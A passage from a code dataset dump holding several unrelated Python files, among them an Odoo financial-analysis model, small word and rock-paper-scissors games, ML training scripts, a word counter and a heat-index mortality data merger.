None\nlow_co2.to_csv(\"ahs_carbon_data.csv\")\nlow_co2.to_excel(\"low_co2.xlsx\")\n\n","sub_path":"generate_historical_report.py","file_name":"generate_historical_report.py","file_ext":"py","file_size_in_byte":31376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"185598760","text":"# -*- coding: utf-8 -*-\n\nimport calendar\nfrom datetime import date, datetime\nfrom odoo import models, fields, api\nfrom odoo.exceptions import UserError\nfrom odoo.tools import DEFAULT_SERVER_DATE_FORMAT as DF\n\nMONTHS = [\n ('01', 'January'), ('02', 'February'), ('03', 'March'),\n ('04', 'April'), ('05', 'May'), ('06', 'June'),\n ('07', 'July'), ('08', 'August'), ('09', 'September'),\n ('10', 'October'), ('11', 'November'), ('12', 'December')]\n\n\nclass FinancialAnalysis(models.TransientModel):\n _name = 'financial.analysis'\n _description = 'Financial Analysis'\n\n @api.model\n def _get_year(self):\n years = []\n curr_year = date.today().year\n for year in range(curr_year - 10, curr_year + 1):\n years.append((str(year), str(year)))\n return years\n\n @api.model\n def _get_months(self):\n return MONTHS\n\n from_year = fields.Selection(\n string='From year',\n required=True,\n selection='_get_year'\n )\n from_month = fields.Selection(\n string='From month',\n required=True,\n selection='_get_months'\n )\n to_year = fields.Selection(\n string=\"To year\",\n required=True,\n selection='_get_year'\n )\n to_month = fields.Selection(\n string='To month',\n required=True,\n selection='_get_months')\n result = fields.Html(string='Result', readonly=True)\n\n @api.constrains('from_year', 'from_month', 'to_month', 'to_year')\n def _check_duration(self):\n for record in self:\n if record.from_year > record.to_year:\n raise UserError('From year must be less than To year')\n elif record.from_year == record.to_year and\\\n record.from_month > record.to_month:\n raise UserError('From month must be less than To month')\n\n @api.multi\n def button_view_analytics_result(self):\n \"\"\"\n TO DO:\n - Button to render report\n \"\"\"\n html = self.env['report'].get_html(\n self.id, \"tv_module.template_financial_analysis\")\n self.write({'result': html})\n return True\n\n @api.model\n def get_payment(self, from_date, to_date):\n payments = self.env['payment.voucher'].search([\n ('state', '=', 'paid'),\n ('paid_date', '>=', from_date),\n ('paid_date', '<=', to_date)])\n return payments\n\n @api.multi\n def get_receipt(self, from_date, to_date):\n receips = self.env['receipt.voucher'].search([\n ('state', '=', 'paid'),\n ('paid_date', '>=', from_date),\n ('paid_date', '<=', to_date)])\n return receips\n\n @api.multi\n def _get_data(self):\n ''' Get data from each month/ year\n '''\n self.ensure_one()\n from_year = self.from_year\n from_month = self.from_month\n from_date = from_year + from_month + '01'\n to_year = self.to_year\n to_month = self.to_month\n to_date = to_year + to_month + \\\n str(calendar.monthrange(int(to_year), int(to_month))[1])\n datas = {}\n month_data = {\n 1: {'payment': 0, 'receipt': 0},\n 2: {'payment': 0, 'receipt': 0},\n 3: {'payment': 0, 'receipt': 0},\n 4: {'payment': 0, 'receipt': 0},\n 5: {'payment': 0, 'receipt': 0},\n 6: {'payment': 0, 'receipt': 0},\n 7: {'payment': 0, 'receipt': 0},\n 8: {'payment': 0, 'receipt': 0},\n 9: {'payment': 0, 'receipt': 0},\n 10: {'payment': 0, 'receipt': 0},\n 11: {'payment': 0, 'receipt': 0},\n 12: {'payment': 0, 'receipt': 0},\n }\n if int(from_year) == int(to_year):\n month_data = {}\n for month in range(int(from_month), int(to_month) + 1):\n month_data.update({\n month: {'payment': 0, 'receipt': 0},\n })\n datas[int(from_year)] = month_data\n else:\n ''' Case from_month < from_year:\n Exp: 2017-06 -> 2018-04\n Data = from 2017-06 -> 2017-12 + 2018-01 -> 2018-04\n '''\n # Period from from_year\n month_from_from_year = {}\n for month in range(int(from_month), 13):\n month_from_from_year.update({\n month: {'payment': 0, 'receipt': 0},\n })\n datas[int(from_year)] = month_from_from_year\n month_from_to_year = {}\n for month in range(1, int(to_month)):\n month_from_to_year.update({\n month: {'payment': 0, 'receipt': 0},\n })\n datas[int(to_year)] = month_from_to_year\n for year in range(int(from_year) + 1, int(to_year)):\n datas.update({\n year: month_data\n })\n\n payments = self.get_payment(from_date, to_date)\n for payment in payments:\n paid_date_obj = datetime.strptime(\n payment.paid_date, DF)\n datas[paid_date_obj.year][paid_date_obj.month]['payment'] +=\\\n payment.amount\n receipts = self.get_receipt(from_date, to_date)\n for receipt in receipts:\n paid_date_obj = datetime.strptime(\n receipt.paid_date, DF)\n datas[paid_date_obj.year][paid_date_obj.month]['receipt'] +=\\\n receipt.amount\n\n # Calcualate Profit\n for year in datas:\n for month in datas[year]:\n payment = datas[year][month]['payment']\n receipt = datas[year][month]['receipt']\n datas[year][month]['profit'] = receipt - payment\n return datas\n\n","sub_path":"project/tv_module/models/financial/financial_analysis.py","file_name":"financial_analysis.py","file_ext":"py","file_size_in_byte":5734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"606099717","text":"from random import randint\n\noptions = [\"Piedra\", \"Papel\", \"Tijeras\"]\n\n# El resultado de salida son las siguientes String\n#'Empate!'\n#'Ganaste!'\n#'Perdiste!'\ndef quienGana(player, ai):\n\n resultPlaer = player.lower()\n resultAI = ai.lower()\n result = \"\"\n\n if (resultPlaer == \"papel\" and resultAI == \"piedra\") or (resultPlaer == \"piedra\" and resultAI == \"tijeras\") or (resultPlaer == \"tijeras\" and resultAI == \"papel\"):\n result = \"Ganaste!\"\n elif (resultPlaer == \"tijeras\" and resultAI == \"piedra\") or (resultPlaer == \"papel\" and resultAI == \"tijeras\") or (resultPlaer == \"piedra\" and resultAI == \"papel\"):\n result = \"Perdiste!\"\n else:\n result = \"Empate!\"\n\n return result\n\n# Entry Point\ndef Game():\n\n # player = input(\"Introduce piedra, papel o tijera: \")\n # ai = options[randint(0,2)]\n \n winner = quienGana(player, ai)\n\n print(winner)\n","sub_path":"src/kata1/rps.py","file_name":"rps.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"356980379","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport json\nwith open('anyueJson.json') as f:\n res= f.read()\n\njson_obj = json.loads(res)\nprint(json_obj)\nfor data in json_obj['data']['stations']:\n print(data)\n id = data['id']\n with open('anyue.txt','a') as f:\n f.write(id+'\\n')","sub_path":"other/chongDianZhuang/getId_anyue.py","file_name":"getId_anyue.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"102241669","text":"import random\n\n\nWORDS = (\"python\", \"jumble\", \"easy\", \"difficult\", \"answer\", \"xylophone\")\n\nword = random.choice(WORDS)\n\nwordLength = len(word)\n\nprint(\"There are %d letters in the word\" % wordLength)\n\ngoodGuess = []\n\nfor i in range(5):\n guess = input(\"Guess one of the letters in the word: \")\n\n if guess.lower() in word:\n print(\"Yes\")\n goodGuess.append(guess)\n else:\n print(\"No\")\nprint(\"Letters in the word:\", goodGuess)\nwordGuess = input(\"Guess the whole word: \")\n\nif wordGuess == word:\n print(\"You guessed it!\")\n\nelse:\n print(\"Incorrect\")\n wordGuess = input(\"Guess hte whole word: \")","sub_path":"chapter-4/challenge4.py","file_name":"challenge4.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"371352154","text":"import os\n\nimport gym\nimport torch\nimport numpy as np\nfrom torchvision import transforms\n\nfrom config_parser.config_parser import ConfigGenerator\n\nfrom torch_runner.experiment_setup import setup_experiment, load_config, get_run_path\nfrom torch_runner.data import transformers, file_loaders, generators\nfrom torch_runner.data.base import BasicDataSet, SequenceDataSet, SequenceDictDataSet\nfrom torch_runner.training_setup import setup_trainer\nfrom torch_runner.handlers import file_handler, tb_handler\n\nfrom trainer import MONetTrainer\nfrom models.monet_stove import MONetStove\n\nfrom get_model import get_model\nfrom util.data import generate_envs_data\nfrom util.envs import AvoidanceTask, BillardsEnv\n\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\n\nconfig, config_object = load_config()\nprint(config)\n\nload_run = config.EXPERIMENT.load_run\nrun_name = config.EXPERIMENT.run_name\nrun_number = config.EXPERIMENT.run_number\n\nif config.EXPERIMENT.random_seed:\n seed = np.random.randint(2**32 - 1)\n config_object.config_dict['EXPERIMENT']['seed'] = seed\n config_object.config_dict['EXPERIMENT']['random_seed'] = False\n np.random.seed(seed)\n torch.manual_seed(seed)\nelse:\n np.random.seed(config.EXPERIMENT.seed)\n torch.manual_seed(config.EXPERIMENT.seed)\n\nconfig, config_object = setup_experiment(config, config_object, debug=False)\nmonet = get_model(config, MONetStove, load_run, run_name, run_number).cuda()\n\nrun_path = get_run_path(\n config.EXPERIMENT.experiment_dir,\n config.EXPERIMENT.run_name,\n config.EXPERIMENT.run_number)\n\ndata_config = config.DATA\ntraining_config = config.TRAINING\n\nif config.EXPERIMENT.game == 'billards':\n env = AvoidanceTask(BillardsEnv(), action_force=0.6)\nelse:\n env = gym.make(config.EXPERIMENT.game)\n\nsource_loader = generators.FunctionLoader(\n generate_envs_data,\n {'env': env, 'num_runs': config.DATA.num_samples//500, 'run_len': 500})\n\ntransformers = [\n transformers.TorchVisionTransformerComposition(config.DATA.transform, config.DATA.shape),\n transformers.TypeTransformer(config.EXPERIMENT.device)\n ]\n\ndata = SequenceDictDataSet(source_loader, transformers, 8)\n\n\ntrainer = setup_trainer(MONetTrainer, monet, training_config, data)\n\ncheckpointing = file_handler.EpochCheckpointHandler(os.path.join(run_path, 'checkpoints'))\ntrainer.register_handler(checkpointing)\n\nregular_logging = file_handler.EpochFileHandler(os.path.join(run_path, 'data'), log_name_list=['imgs'])\ntrainer.register_handler(regular_logging)\n\ntb_logging_list = ['average_elbo', 'trans_lik', 'log_z_f', 'img_lik_forward', 'elbo', 'z_s', 'img_lik_mean', 'p_x_loss', 'p_x_loss_mean']\ntb_logger = tb_handler.NStepTbHandler(config.EXPERIMENT.log_every, run_path, 'logging', log_name_list=tb_logging_list)\ntrainer.register_handler(tb_logger)\n\nif config.EXPERIMENT.model == 'm-stove':\n trainer.model.img_model.init_background_weights(trainer.train_dataloader.dataset.get_all())\n\ntrainer.check_ready()\ntrainer.train(config.TRAINING.epochs, train_only=True, pretrain=config.TRAINING.pretrain, visdom=False)\n\nif config.TRAINING.pretrain:\n monet.img_model.beta = config.MODULE.MONET.beta\n trainer = setup_trainer(MONetTrainer, monet, training_config, data)\n \n checkpointing = file_handler.EpochCheckpointHandler(os.path.join(run_path, 'checkpoints'))\n trainer.register_handler(checkpointing)\n \n regular_logging = file_handler.EpochFileHandler(os.path.join(run_path, 'data'), log_name_list=['imgs'])\n trainer.register_handler(regular_logging)\n \n tb_logging_list = ['average_elbo', 'trans_lik', 'log_z_f', 'img_lik_forward', 'elbo', 'z_s', 'img_lik_mean', 'p_x_loss_mean']\n tb_logger = tb_handler.NStepTbHandler(config.EXPERIMENT.log_every, run_path, 'logging', log_name_list=tb_logging_list)\n trainer.register_handler(tb_logger)\n trainer.check_ready()\n trainer.train(config.TRAINING.epochs_stove, train_only=True, pretrain=False, visdom=False)\n","sub_path":"STOVETraining/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"4502753","text":"#Frederick Herzog\n# Python Word Count\n# 10/30/2020\n\nfrom re import sub\nfrom collections import Counter\nfrom os import system\n\ndef txt_WordsToList(file):\n\twith open(file, 'r') as f:\n\t\tdata = f.read().split()\n\t\treturn data\n\t\ndef removePunct(dat):\n\tcleandat = []\n\tfor word in dat:\n\t\tcleaned_word = sub('[^A-Za-z0-9]+', '', word)\n\t\tcleandat.append(cleaned_word)\n\treturn cleandat\n\ndef makeLowerCase(dat):\n\tlower_case = [w.lower() for w in dat]\n\treturn lower_case\n\ndef countWords(dat):\n\tcount = Counter\n\tc = count(dat)\n\treturn dict_to_tuples(c)\n\ndef dict_to_tuples(dat):\n\tfreq = []\n\tfor k, v in dat.items():\n\t\tfreq.append((v,k))\n\tfreq.sort(reverse = True)\n\treturn freq\n\ndef out_to_txt(dat, f):\n\twith open(f, 'w') as f:\n\t\tfor i in dat:\n\t\t\tf.write(' , '.join (str(s) for s in i) + '\\n')\n\ndef passtoDFS(f):\n\tpass\n\nif __name__ == '__main__':\n\tfile_path = \"Shakespeare.txt\"\n\toutput_file_path = \"count.txt\"\n\twords = txt_WordsToList(file_path)\n\twords_no_punct = removePunct(words)\n\tlower_c_words = makeLowerCase(words_no_punct)\n\tmy_count = countWords(lower_c_words)\n\tprint(my_count)\n\tout_to_txt(my_count, output_file_path)\n\n\t#passtoDFS(output_file_path)\n\n\n","sub_path":"code_snippets/DataDev/wordcounts/wrdcount.py","file_name":"wrdcount.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"279972856","text":"#!/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport os\n\nimport numpy as np\nimport pandas as pd\n\nPROJECT_DIR = \"/home/lee/heat\"\nDATA_DIR = os.path.join(PROJECT_DIR, \"raw-data\")\nRESULTS_DIR = os.path.join(PROJECT_DIR, \"results\")\nHI_DIR = os.path.join(RESULTS_DIR, \"hi-by-nuts3\")\nMORTALITY = os.path.join(DATA_DIR, \"demo_r_deaths_1_Data.csv\")\nAGE_DISTRIBUTION = os.path.join(DATA_DIR, \"demo_r_pjanaggr3_1_Data.csv\")\nOUTPUT_DIR = os.path.join(RESULTS_DIR, \"hi-mortality\")\nAGGREGATIONS = (\"minimum\", \"average\", \"maximum\")\nMETRICS = (\"danger-threshold-crossings\", \"longest-runs\", \"number-of-runs\")\nCSV_MAP = os.path.join(DATA_DIR, \"nuts-ids.csv\")\nMETRIC_MAPPINGS = {\"danger\": \"cross\",\n \"longest\": \"longrun\",\n \"number\": \"nrun\"}\nOUTPUT_PATH = os.path.join(OUTPUT_DIR, \"yearly-hi-stats-per-nuts3.csv\")\n\n\ndef read_eurostat_table(csv_file, usecols):\n \"\"\"\n Read Eurostat table with correct encoding, NA, thousand behavior, etc.\n\n As there are no relevant flags or footnotes, I discard them all.\n \"\"\"\n return pd.read_csv(csv_file, encoding=\"latin-1\", usecols=usecols,\n thousands=\",\", na_values=\":\")\n\n\ndef join_mortality_and_elderly_population() -> pd.DataFrame:\n \"\"\"\n Join tables of mortality and elderly population.\n\n The output dataframe contains total population and percentual elderly\n population and yearly mortality for all NUTS3 regions.\n \"\"\"\n mortality = read_eurostat_table(MORTALITY, range(3))\n age_dist = read_eurostat_table(AGE_DISTRIBUTION, range(5))\n age_dist = age_dist[age_dist.SEX == \"Total\"]\n # Now aggregate using AGE. You need 1 column for total population that you\n # keep, 1 column with proportion of population >= 65, and 1 column of\n # mortality for that year.\n grouped_by_age = age_dist.groupby(\"AGE\")\n total_population = grouped_by_age.get_group(\"Total\")\n elderly_population = grouped_by_age.get_group(\"65 years or over\")\n elderly_proportion = (elderly_population.Value.values /\n total_population.Value.values)\n # Append elderly proportion column onto total population\n total_population[\"elderly\"] = elderly_proportion\n total_population = total_population[[\"TIME\", \"GEO\", \"Value\", \"elderly\"]]\n total_population.rename(columns={\"Value\": \"population\"}, inplace=True)\n mort_and_elderly_pop = pd.merge(total_population, mortality,\n on=[\"TIME\", \"GEO\"])\n mort_and_elderly_pop[\"mortality\"] = (mort_and_elderly_pop.Value.values /\n mort_and_elderly_pop.population.values)\n mort_and_elderly_pop.drop(\"Value\", axis=1, inplace=True)\n mort_and_elderly_pop.rename(columns={\"TIME\": \"year\", \"GEO\": \"region\"},\n inplace=True)\n output = os.path.join(OUTPUT_DIR, \"mortality-and-elderly-proportion.csv\")\n mort_and_elderly_pop.to_csv(output, encoding=\"utf-8\")\n return mort_and_elderly_pop\n\n\ndef clean_population(population: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n Replace region descriptions with NUTS IDs, drop unneeded rows and columns.\n \"\"\"\n ids_to_names = pd.read_csv(CSV_MAP, usecols=(2, 3))\n population = pd.merge(population, ids_to_names, left_on=\"region\",\n right_on=\"Description\")\n population.drop([\"region\", \"Description\"], 1, inplace=True)\n population.rename(columns={\"NUTS-Code\": \"nuts_id\"}, inplace=True)\n population.dropna(inplace=True)\n return population\n\n\ndef attach_heat_index(heat_index_files: pd.DataFrame,\n population_df: pd.DataFrame) -> pd.DataFrame:\n \"\"\"\n Merge heat index and demographic dataframes.\n\n Some of the columns are boolean. This is because they measure the number of\n heat waves in which the minimum heat index exceeded a threshold for over 5\n days. Because this would mean that the nighttime heat index was at a\n dangerous level for at least 5 days in a row, this never occured for any\n danger levels beyond \"caution\". For this reason, those columns are\n boolean. At the end of the function they're converted to ints.\n \"\"\"\n results = population_df.copy()\n for hi_file in heat_index_files:\n # No need to parse dates, they're stored as ints anyway\n hi_df = pd.read_csv(hi_file, index_col=0)\n stat, metric = os.path.basename(hi_file).split(\"-\")[:2]\n stat = stat[:3]\n metric = METRIC_MAPPINGS[metric]\n rename_dict = {\"extreme caution\": \"_\".join((stat, metric,\n \"ext_caution\")),\n \"extreme danger\": \"_\".join((stat, metric, \"ext_danger\")),\n \"caution\": \"_\".join((stat, metric, \"caution\")),\n \"danger\": \"_\".join((stat, metric, \"danger\"))}\n hi_df.rename(columns=rename_dict,\n inplace=True)\n results = pd.merge(results, hi_df, on=(\"nuts_id\", \"year\"))\n for col in results.columns[5:]:\n if results[col].dtype == np.bool:\n results[col] = results[col].astype(np.int64)\n return results\n\n\ndef main():\n population = clean_population(join_mortality_and_elderly_population())\n print(\"Cleaned population data.\")\n\n heat_index_files = []\n for metric in (\"minimum\", \"average\", \"maximum\"):\n heat_index_files += [os.path.join(HI_DIR,\n \"{}-{}.csv\".format(metric,\n aggregation))\n for aggregation in (\"danger-threshold-crossings\",\n \"longest-runs\",\n \"number-of-runs\")]\n\n print(\"Attaching heat index to population.\")\n results = attach_heat_index(heat_index_files, population)\n print(\"Writing results to {}.\".format(OUTPUT_PATH))\n results.to_csv(OUTPUT_PATH)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/3-hi-by-country/combine_hi_mortality.py","file_name":"combine_hi_mortality.py","file_ext":"py","file_size_in_byte":5949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"399175242","text":"# coding: utf-8\nfrom typing import Dict, List, Iterator\nimport torch\nimport random\nimport numpy as np\nimport os\nimport yaml\nimport json\nfrom misc.metrics import Accuracy\nfrom misc.constant import dirs_to_backup\n\n\nclass Functional(object):\n\n def __init__(self, params: Dict = None):\n self.__set_seed(params['randomseed'])\n self.params = params\n self.use_gpu = True if params['device'] == 'gpu' else False\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() and self.use_gpu else \"cpu\")\n\n self.checkpoint_dir = params['checkpoint_dir']\n self.summary_dir = params['summary_dir']\n self.log_dir = params['log_dir']\n self.data_path = params['data_path']\n self.bert_embedding_dir = params['bert_embedding_dir']\n self.backup = not params['not_backup'] if 'not_backup' in params else None\n\n self.dataset = params['dataset']\n self.train_prefix = params['train_prefix']\n self.test_prefix = params['test_prefix']\n\n self.use_bert_embedding = params['use_bert_embedding']\n self.bert_embedd_dim = 768\n if self.use_bert_embedding:\n print('Use bert embedding...')\n self.bert_embedd_dim = params['bert_embedd_dim']\n self.embedd_dim = params['embedd_dim']\n self.freeze_embedd = params['freeze_embedd']\n self.drop_word = params['drop_word'] if 'drop_word' in params else None\n self.dis_size = params['dis_size'] if 'dis_size' in params else None\n self.coref_size = params['coref_size'] if 'coref_size' in params else None\n self.entity_type_size = params['entity_type_size'] if 'entity_type_size' in params else None\n self.nlayer = params['nlayer'] if 'nlayer' in params else None\n self.cat_nlayer = params['cat_nlayer'] if 'cat_nlayer' in params else None\n self.hidden_size = params['hidden_size'] if 'hidden_size' in params else None\n self.lstm_keep_prob = params['lstm_keep_prob'] if 'lstm_keep_prob' in params else None # for lstm\n self.entity_span_pooling = params['entity_span_pooling'] if 'entity_span_pooling' in params else None\n self.coref_pooling = params['coref_pooling'] if 'coref_pooling' in params else None # For Baseline BiLSTM-M, default `mean`\n self.which_model = params['which_model'] if 'which_model' in params else None\n\n self.mutual_attender = params['mutual_attender'] if 'mutual_attender' in params else None\n self.integration_attender = params['integration_attender'] if 'integration_attender' in params else None\n self.use_bilinear = params['use_bilinear'] if 'use_bilinear' in params else None\n self.use_distance = params['use_distance'] if 'use_distance' in params else None\n self.use_overlap = params['use_overlap'] if 'use_overlap' in params else None\n self.bi_affine_dropout = params['bi_affine_dropout'] if 'bi_affine_dropout' in params else None\n\n self.max_epoch = params['max_epoch'] if 'max_epoch' in params else None\n self.init_lr = params['init_lr'] if 'init_lr' in params else None\n self.batch_size = params['batch_size'] if 'batch_size' in params else None\n self.train_h_t_limit = params['train_rel_limit_per_example'] if 'train_rel_limit_per_example' in params else None\n self.test_batch_size = params['test_batch_size'] if params['test_batch_size'] else self.batch_size\n self.exp_id = params['exp_id']\n self.test_relation_limit = params['test_rel_limit_per_example'] if 'test_rel_limit_per_example' in params else None\n self.use_lr_scheduler = params['use_lr_scheduler'] if 'use_lr_scheduler' in params else None\n self.use_neg_sample = params['use_neg_sample'] if 'use_neg_sample' in params else None\n self.neg_sample_multiplier = params['neg_sample_multiplier'] if 'neg_sample_multiplier' in params else None\n\n self.debug_test = params['debug_test']\n self.write_weights = params['write_weights']\n self.epoch_start_to_eval = params['epoch_start_to_eval']\n\n self.pretrain_model = None\n self.model_loaded_from_epoch = None\n self.coref_only = False\n self.use_sample_weight = False\n self.accumulation_steps = 1\n # if self.use_neg_sample:\n # self.train_h_t_limit = 70 * (self.neg_sample_multiplier + 1) # 70: max num_rels of train (and dev)\n\n self.max_length = params['max_length']\n self.relation_num = params['relation_num']\n self.entity_type_num = params['entity_type_num']\n self.pos_num = 2 * self.max_length\n self.entity_num = self.max_length\n self.dis2idx = self._get_dis2idx()\n self.period = 50\n\n for _dir in [self.log_dir, self.checkpoint_dir, self.summary_dir]:\n if not os.path.exists(_dir):\n os.mkdir(_dir)\n\n self.logging(self.exp_id)\n self.id2word = json.load(open(os.path.join(self.data_path, 'word2id.json')))\n self.id2word = {idx: word for word, idx in self.id2word.items()}\n\n self.input_theta_of_best_epoch = -1\n self.acc_NA = Accuracy()\n self.acc_not_NA = Accuracy()\n self.acc_total = Accuracy()\n self.best_scores = {\n 'main_metric': {\n 'ign_f1': 0.0,\n 'epoch': 0,\n 'auc': 0.0\n },\n 'auc': 0.0,\n 'ign_coref_f1': 0.0,\n 'ign_non_coref_f1': 0.0\n }\n\n self.num_train_entity_pairs = 0\n self.num_pos_entity_pairs = None\n self.num_neg_entity_pairs = None\n self.num_test_entity_pairs = None\n\n def print_train_num_pos_neg(self):\n self.logging(f\"num_train_entity_pairs: {self.num_train_entity_pairs}. \"\n f\"use_neg_sample: {self.use_neg_sample}; #P:#N=1:{self.neg_sample_multiplier}\"\n f\" = {self.num_pos_entity_pairs}:{self.num_neg_entity_pairs}\")\n\n def print_test_num_entity_pairs(self):\n self.logging(f\"num_test_entity_pairs: {self.num_test_entity_pairs}. \")\n\n def __set_seed(self, randomseed):\n torch.manual_seed(randomseed)\n torch.cuda.manual_seed(randomseed)\n torch.cuda.manual_seed_all(randomseed)\n random.seed(randomseed)\n np.random.seed(randomseed)\n torch.backends.cudnn.deterministic = True\n\n def logging(self, s, print_=True, log_=True):\n if print_:\n print(s)\n if log_:\n with open(os.path.join(os.path.join(\"log\", self.exp_id)), 'a+', encoding='utf8') as f_log:\n f_log.write(s + '\\n')\n\n def set_on_cpu(self):\n self.use_gpu = False\n self.device = torch.device(\"cpu\")\n\n def backup_codes(self):\n from shutil import copy as sh_copy, copytree as sh_cptree\n import os\n\n def ignore(src, names):\n return ['__pycache__']\n # backup dirs\n backup_dir = f\"./{self.summary_dir}/{self.exp_id}\"\n for _dir in dirs_to_backup:\n sh_cptree(_dir, f\"./{backup_dir}/{_dir}\", ignore=ignore)\n # backup ./*.py\n for _file in os.listdir('./'):\n if _file.endswith('.py'):\n sh_copy(f\"./{_file}\", f\"./{backup_dir}/{_file}\")\n # backup params\n _file = os.path.basename(self.params['param_file'])\n yaml.dump(self.params, open(f\"{backup_dir}/{self.exp_id}___{_file}\", 'w'))\n\n def visualize_data(self, prefix, data, n=1, max_len=30):\n def to_np(from_data, dtype='int32'):\n return from_data.cpu().numpy().astype(dtype).tolist()\n for i in range(n):\n try:\n # print(f\"{prefix}_index: {data['indexes'][i]}\")\n self.logging(f\"{prefix}_index: {data['indexes'][i]}\", log_=(i == 0))\n if 'context_idxs' in data:\n context_idxs = to_np(data['context_idxs'][i])\n tokens_str = ' '.join([self.id2word[idx] for idx in context_idxs[:max_len]])\n self.logging(f\"tokens: {tokens_str}\", log_=(i == 0))\n if 'context_pos' in data:\n context_pos = to_np(data['context_pos'][i][:max_len])\n print(f\"context_pos (coref): {context_pos}\")\n if 'for_relation_repr' in data:\n for_relation_repr = data['for_relation_repr']\n if 'entity_span_indices' in for_relation_repr:\n entity_span_indices = to_np(for_relation_repr['entity_span_indices'][i][:5])\n print(f\"entity_span_indices: {entity_span_indices}\")\n if 'ht_pair_pos' in data:\n print(f\"ht_pair_pos size : {data['ht_pair_pos'].size()}\")\n print('one sample (part):')\n to_print = to_np(data['ht_pair_pos'][i][:5])\n if isinstance(to_print[0], list):\n for item in to_print:\n print(item)\n else:\n print(to_print)\n except IndexError as indexE:\n break\n\n def padding(self, X, max_len, dim):\n return np.concatenate([\n X, np.zeros((max_len-X.shape[0], dim))\n ])\n\n def _get_dis2idx(self):\n values = np.zeros((self.max_length), dtype='int64')\n values[1] = 1\n values[2:] = 2\n values[4:] = 3\n values[8:] = 4\n values[16:] = 5\n values[32:] = 6\n values[64:] = 7\n values[128:] = 8\n values[256:] = 9\n return values\n\n def get_head_tail_relative_pos(self, head, tail) -> int:\n delta_dis = head['pos'][0] - tail['pos'][0]\n if delta_dis < 0:\n relative_pos_idx = -int(self.dis2idx[-delta_dis])\n else:\n relative_pos_idx = int(self.dis2idx[delta_dis])\n return relative_pos_idx\n\n def set_max_epoch(self, max_epoch):\n self.max_epoch = max_epoch\n\n def _compute_acc(self, relation_label, output) -> None:\n for i in range(output.shape[0]):\n for j in range(output.shape[1]):\n label = relation_label[i][j]\n if label < 0:\n break\n if label == 0:\n self.acc_NA.add(output[i][j] == label)\n else:\n self.acc_not_NA.add(output[i][j] == label)\n self.acc_total.add(output[i][j] == label)\n\n def _to_tensor(self, data, dtype='float'):\n assert dtype in ['float', 'long', 'bool']\n if dtype == 'float':\n return torch.Tensor(data).to(self.device)\n elif dtype == 'long':\n return torch.LongTensor(data).to(self.device)\n elif dtype == 'bool':\n return torch.BoolTensor(data).to(self.device)\n\n def format_params(self, params) -> List[str]:\n config_lines = list()\n for attr in params:\n try:\n value = self.__getattribute__(attr)\n if value is not None:\n config_lines.append(\"{:<23}: {}\\n\".format(attr, value))\n except AttributeError:\n continue\n return config_lines\n\n def get_format_params_end_line(self):\n return f\"{'='*48}\\n\\n\"\n\n def get_train_batch(self) -> Iterator[Dict]:\n raise NotImplementedError\n\n def get_test_batch(self) -> Iterator[Dict]:\n raise NotImplementedError\n\n def check_get_batches(self):\n print(\"start get_train_batches ...\")\n for data in self.get_train_batch():\n pass\n print(\"get_train_batches ends.\")\n print(\"start get_test_batches ...\")\n for data in self.get_test_batch():\n pass\n print(\"get_test_batches ends.\")\n\n def get_config_str(self) -> str:\n params = ['dataset', 'train_prefix', 'test_prefix', 'max_length', 'use_bert_embedding',\n 'bert_embedd_dim', 'embedd_dim', 'freeze_embedd', 'drop_word', 'nlayer', 'cat_nlayer',\n 'hidden_size', 'which_model', 'mutual_attender', 'integration_attender', 'bi_affine_dropout',\n 'use_distance', 'use_overlap', 'use_bilinear', 'batch_size', 'init_lr', 'use_lr_scheduler',\n 'train_h_t_limit', 'test_batch_size', 'test_relation_limit',\n 'max_epoch', 'epoch_start_to_eval', 'use_neg_sample', 'neg_sample_multiplier']\n # Make sure that params have the same name with the property.\n # E.g., 'dataset' --> self.dataset\n # `format_params` will call self.__getattribute__(param)\n config_lines = list()\n config_lines.append(f\"{'='*18} Parameters {'='*18}\\n\")\n config_lines.extend(self.format_params(params))\n return \"\".join(config_lines)\n\n\n","sub_path":"trainer/functional.py","file_name":"functional.py","file_ext":"py","file_size_in_byte":12690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"76643495","text":"'''\r\n@author: xusheng\r\n'''\r\n\r\nfrom multiprocessing import Process, Queue\r\nimport os, time, random\r\nimport xlrd\r\nimport xlwt\r\nfrom six.moves import xrange\r\nimport argparse\r\n\r\nclass DataObject(object):\r\n @property\r\n def order_date(self):\r\n return self._order_date\r\n \r\n @order_date.setter\r\n def order_date(self, value):\r\n self._order_date = value\r\n \r\n @property\r\n def insurance_name(self):\r\n return self._insurance_name\r\n \r\n @insurance_name.setter\r\n def insurance_name(self, value):\r\n self._insurance_name = value\r\n \r\n @property\r\n def insurance_type(self):\r\n return self._insurance_type\r\n \r\n @insurance_type.setter\r\n def insurance_type(self, value):\r\n self._insurance_type = value\r\n\r\n @property\r\n def insurance_premium(self):\r\n return self._insurance_premium\r\n \r\n @insurance_premium.setter\r\n def insurance_premium(self, value):\r\n self._insurance_premium = value\r\n\r\n @property\r\n def insurance_commission(self):\r\n return self._insurance_commission\r\n \r\n @insurance_commission.setter\r\n def insurance_commission(self, value):\r\n self._insurance_commission = value\r\n \r\n @property\r\n def staff_no(self):\r\n return self._staff_no\r\n \r\n @staff_no.setter\r\n def staff_no(self, value):\r\n self._staff_no = 